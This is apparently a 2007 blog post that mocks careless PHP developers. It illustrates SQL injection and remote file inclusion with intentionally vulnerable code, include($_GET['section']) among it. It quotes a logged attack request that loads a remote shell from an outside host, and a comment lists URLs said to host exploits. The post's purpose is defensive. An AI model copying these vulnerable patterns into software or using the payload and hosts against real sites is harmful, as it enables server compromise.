Get defacements, database dumps, remote shells, ownages and much more!

13 12 2007 at 22:58

Code

defacements, php, security, spam, validations

It works like that: you write dynamic code and allow parameters to be sent to your code. Then without any type of filtering or validation you use those raw values as parameters for your code. I'll give you two examples so that you can get the result almost instantly: Example 1: open up your database The script would be called as news.php?id=1, which would mean "give me the news whose id equals 1" Then in news.php you have something like $result = mysql_query("SELECT * FROM news WHERE id=".$_GET['id']) This will make it easy even for level 1 script kiddies to practise their exploiter skills. Nothing too serious, you know, they may freely read and modify your data. Child games! To make sure they get the maximum benefit of their stay in your server, don't forget to store unencrypted passwords, so when they copy the users table, they can try to log into all the users' accounts since most of the people use the same password for every online service. Example 2: open up your file system (and everything else) You've been told about the advantages of using include files. You not only are using include() for including the header and footer, but you load each section using something like index.php?section=name_of_the_section Then in index.php you have this: include($_GET['section']); Usually it would be used with values of $_GET['section'] such as 'clients.htm', 'about_us.htm', 'our_company.htm'... You name it! But what would you say if a script kiddie went creative and instead of just entering a simple filename in your server, decided to add an http:// in front of it? Like for example: index.php?section=http://astrangeserver/somewhere/including/usually/an/image.jpg Php will kindly load whatever is in that url and evaluate the contents as php code. What, evaluate an image? You'll be surprised. Try to open that image in your browser. Oh, image.jpg "can't be displayed by the browser because it contains errors". Really? Of course, because it's not meant to be displayed, but to be executed. In fact it is a php file which contains code for converting your innocent index.php in a complete control panel from where a cracker can install more stuff in your server, or even try to deface other websites. So php loads it, evaluates it and suddenly there's a bunch of code ready to be executed at the cracker's will. Isn't it brilliant, amazing, great? ... obviously not! It's like eating food from dodgy take-aways without thinking twice. You never know what you eat! I personally I'm bored to death of finding in the server logs request such as index.php?id=http://www.antiqbook.co.uk/map/.xpl/lila.jpg?&cmd=cat%20bugado And it just shows there's still people tacitly allowing undesirable behaviour to happen in their servers, without giving a damn about that, or even worse, without knowing about that. I wonder if the antiqbook administrators know about this directory with plenty of exploits, remote shells and what not in their server. Or maybe they are just a fake company. So do us a favour: filter and validate your url parameters and stop contributing to illegal activities such as spam. Thank you very much.

It works like that: you write dynamic code and allow parameters to be sent to your code. Then without any type of filtering or validation you use those raw values as parameters for your code.

I’ll give you two examples so that you can get the result almost instantly:

Example 1: open up your database

The script would be called as news.php?id=1, which would mean “give me the news whose id equals 1″

Then in news.php you have something like

$result = mysql_query("SELECT * FROM news WHERE id=".$_GET['id'])

This will make it easy even for level 1 script kiddies to practise their exploiter skills. Nothing too serious, you know, they may freely read and modify your data. Child games!

To make sure they get the maximum benefit of their stay in your server, don’t forget to store unencrypted passwords, so when they copy the users table, they can try to log into all the users’ accounts since most of the people use the same password for every online service.

Example 2: open up your file system (and everything else)

You’ve been told about the advantages of using include files. You not only are using include() for including the header and footer, but you load each section using something like index.php?section=name_of_the_section

Then in index.php you have this:

include($_GET['section']);

Usually it would be used with values of $_GET['section'] such as ‘clients.htm’, ‘about_us.htm’, ‘our_company.htm’… You name it! But what would you say if a script kiddie went creative and instead of just entering a simple filename in your server, decided to add an http:// in front of it?

Like for example: index.php?section=http://astrangeserver/somewhere/including/usually/an/image.jpg

Php will kindly load whatever is in that url and evaluate the contents as php code.

What, evaluate an image? You’ll be surprised.

Try to open that image in your browser. Oh, image.jpg “can’t be displayed by the browser because it contains errors”. Really? Of course, because it’s not meant to be displayed, but to be executed. In fact it is a php file which contains code for converting your innocent index.php in a complete control panel from where a cracker can install more stuff in your server, or even try to deface other websites.

So php loads it, evaluates it and suddenly there’s a bunch of code ready to be executed at the cracker’s will.

Isn’t it brilliant, amazing, great?

… obviously not!

It’s like eating food from dodgy take-aways without thinking twice. You never know what you eat!

I personally I’m bored to death of finding in the server logs request such as index.php?id=http://www.antiqbook.co.uk/map/.xpl/lila.jpg?&cmd=cat%20bugado

And it just shows there’s still people tacitly allowing undesirable behaviour to happen in their servers, without giving a damn about that, or even worse, without knowing about that. I wonder if the antiqbook administrators know about this directory with plenty of exploits, remote shells and what not in their server. Or maybe they are just a fake company.

So do us a favour: filter and validate your url parameters and stop contributing to illegal activities such as spam. Thank you very much.

Comments

madgoblin

20071214

Great post! :)
Just one comment: Dont forget to validate and sanitize the values sent in forms to the server. The most common way of doing it (wrong) is to use javascript on the client machine to check each field in the form, but it’s not very secure because we can modify the JS code in many ways do disable the validation.
^o^
sole

20071214

Yes, terribly right. There are lots of online shops which rely on that for validating the phone number, e-mail, etc.

If only their developers knew about firebug or the web developer toolbar. Or even curl… As a rule we should NEVER trust external values!
sole

20071214

And more directories and places with exploits and nasty stuff:

Courtesy of ip 72.232.138.198 (belonging to Layered Technologies, Inc.) which was proxying using several different ips in several places (maybe using zombie computers?) but with a user agent of Internet Explorer (quite disappointing, if at least it had been curl or something like LWP::Simple, which I found in yesterday’s attack attempt…):

targi.pc-tuning.pl/stats/option/qadipi/
interkonet.com/enxicmarxant/web/editor/scripts/icons/catizi/arofo/
sanyoclim.fr/extension/ezodf/caj/kuyufuh/
service-exposants.com/store/punotag/
sibstro.ru/dom/images/news/vilipu/
kidspace-epe.com/photos/enahur/
flower8955.com/pay/log/tece/eko/
auto.ojciec.net/fotografie/fafizik/

soledad penadés

repeat 4[fd 100 rt 90]

Get defacements, database dumps, remote shells, ownages and much more!

Example 1: open up your database

Example 2: open up your file system (and everything else)

… obviously not!

Comments